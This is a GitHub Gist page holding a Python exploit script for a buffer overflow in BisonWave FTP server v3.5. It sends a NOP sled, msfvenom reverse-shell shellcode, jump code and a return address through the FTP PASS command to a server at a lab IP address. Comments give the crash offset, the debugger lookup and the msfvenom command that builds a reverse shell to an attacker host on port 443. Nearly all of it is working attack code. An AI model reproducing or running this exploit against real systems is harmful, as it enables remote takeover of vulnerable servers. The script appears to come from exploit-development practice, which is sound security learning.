Created
November 5, 2019 23:25
-
-
Save BillRizer/69bb81b01b4f526f42364905da269f34 to your computer and use it in GitHub Desktop.
Exploit BisonWave FTP server v.3.5
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import socket,time | |
#jump memory code | |
jmp = "\x83\xEB\x32"*8 | |
jmp += "\xff\xe3" | |
#exploit code | |
buf = "" | |
buf += "\xbe\xa8\x9a\x2c\x48\xda\xce\xd9\x74\x24\xf4\x5d\x31" | |
buf += "\xc9\xb1\x52\x83\xed\xfc\x31\x75\x0e\x03\xdd\x94\xce" | |
buf += "\xbd\xe1\x41\x8c\x3e\x19\x92\xf1\xb7\xfc\xa3\x31\xa3" | |
buf += "\x75\x93\x81\xa7\xdb\x18\x69\xe5\xcf\xab\x1f\x22\xe0" | |
buf += "\x1c\x95\x14\xcf\x9d\x86\x65\x4e\x1e\xd5\xb9\xb0\x1f" | |
buf += "\x16\xcc\xb1\x58\x4b\x3d\xe3\x31\x07\x90\x13\x35\x5d" | |
buf += "\x29\x98\x05\x73\x29\x7d\xdd\x72\x18\xd0\x55\x2d\xba" | |
buf += "\xd3\xba\x45\xf3\xcb\xdf\x60\x4d\x60\x2b\x1e\x4c\xa0" | |
buf += "\x65\xdf\xe3\x8d\x49\x12\xfd\xca\x6e\xcd\x88\x22\x8d" | |
buf += "\x70\x8b\xf1\xef\xae\x1e\xe1\x48\x24\xb8\xcd\x69\xe9" | |
buf += "\x5f\x86\x66\x46\x2b\xc0\x6a\x59\xf8\x7b\x96\xd2\xff" | |
buf += "\xab\x1e\xa0\xdb\x6f\x7a\x72\x45\x36\x26\xd5\x7a\x28" | |
buf += "\x89\x8a\xde\x23\x24\xde\x52\x6e\x21\x13\x5f\x90\xb1" | |
buf += "\x3b\xe8\xe3\x83\xe4\x42\x6b\xa8\x6d\x4d\x6c\xcf\x47" | |
buf += "\x29\xe2\x2e\x68\x4a\x2b\xf5\x3c\x1a\x43\xdc\x3c\xf1" | |
buf += "\x93\xe1\xe8\x56\xc3\x4d\x43\x17\xb3\x2d\x33\xff\xd9" | |
buf += "\xa1\x6c\x1f\xe2\x6b\x05\x8a\x19\xfc\xea\xe3\x38\xfa" | |
buf += "\x82\xf1\x3a\x03\xe8\x7f\xdc\x69\x1e\xd6\x77\x06\x87" | |
buf += "\x73\x03\xb7\x48\xae\x6e\xf7\xc3\x5d\x8f\xb6\x23\x2b" | |
buf += "\x83\x2f\xc4\x66\xf9\xe6\xdb\x5c\x95\x65\x49\x3b\x65" | |
buf += "\xe3\x72\x94\x32\xa4\x45\xed\xd6\x58\xff\x47\xc4\xa0" | |
buf += "\x99\xa0\x4c\x7f\x5a\x2e\x4d\xf2\xe6\x14\x5d\xca\xe7" | |
buf += "\x10\x09\x82\xb1\xce\xe7\x64\x68\xa1\x51\x3f\xc7\x6b" | |
buf += "\x35\xc6\x2b\xac\x43\xc7\x61\x5a\xab\x76\xdc\x1b\xd4" | |
buf += "\xb7\x88\xab\xad\xa5\x28\x53\x64\x6e\x48\xb6\xac\x9b" | |
buf += "\xe1\x6f\x25\x26\x6c\x90\x90\x65\x89\x13\x10\x16\x6e" | |
buf += "\x0b\x51\x13\x2a\x8b\x8a\x69\x23\x7e\xac\xde\x44\xab" | |
buffer ="\x90"*(1115 - len(buf)) + buf + "B"* (40 - len(jmp)) + jmp+"\x8f\xe8\xb1\x7c" | |
soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
# 192.168.25.27 -> VM server ftp ip | |
soc.connect(("192.168.25.27",21)) | |
time.sleep(1) | |
r = soc.recv(2048) | |
soc.send("USER anonymous\r\n") | |
r = soc.recv(1024) | |
soc.send("PASS "+buffer+"\r\n") | |
r = soc.recv(1024) | |
# helper: | |
# !mona find -s "\xff\xe4" -m bisonftp.exe | |
# 0040307D . FFE3 JMP EBX | |
# 7CB1E88F FFE3 JMP EBX -- system32 | |
# crash 1200 | |
# pattern_offset = 42356D42 -> 1155 pos | |
# this exploit connect in reverse shell | |
# change the IP ;) | |
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.25.6 LPORT=443 -b "\x00\x0a\x0d\x20\x40" EXITFUNC=thread -f python | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment